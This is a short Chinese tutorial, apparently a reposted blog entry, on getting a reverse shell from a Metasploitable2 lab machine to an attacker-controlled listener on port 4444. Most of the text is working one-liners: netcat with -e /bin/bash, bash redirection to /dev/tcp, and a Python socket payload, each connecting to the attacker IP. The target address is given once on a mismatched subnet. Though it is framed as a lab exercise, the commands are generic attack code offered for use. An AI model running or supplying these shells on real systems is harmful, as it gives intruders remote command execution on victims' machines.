天天看點

linux系統常用指令利用——反彈shell一、環境二、具體實操

一、環境

Aliyun Linux (192.168.47.136)
Metasploitable2 Linux (192.169.47.133)
目的: 将Metasploitable 的 shell 反彈給 Aliyun
           

二、具體實操

2.1 通過 linux 指令 NC

1、首先 Aliyun 偵聽某個端口 如 4444 端口
nc -nvlp 4444

2、Meta..上執行:
nc -e /bin/bash 192.168.47.136 4444
           
linux系統常用指令利用——反彈shell一、環境二、具體實操

2.2 通過bash指令

1、首先 Aliyun 偵聽某個端口 如 4444 端口
nc -nvlp 4444

2、Meta..上執行:
bash -i >& /dev/tcp/192.168.47.136/4444 0>&1
           

2.3 通過python指令

1、首先 Aliyun 偵聽某個端口 如 4444 端口
nc -nvlp 4444

2、Meta..上執行:
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.47.136',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
           

以上就是一般 linux 系統自帶指令的利用反彈 shell 步驟了!

其他需要自己安裝配置的指令就不寫了!

繼續閱讀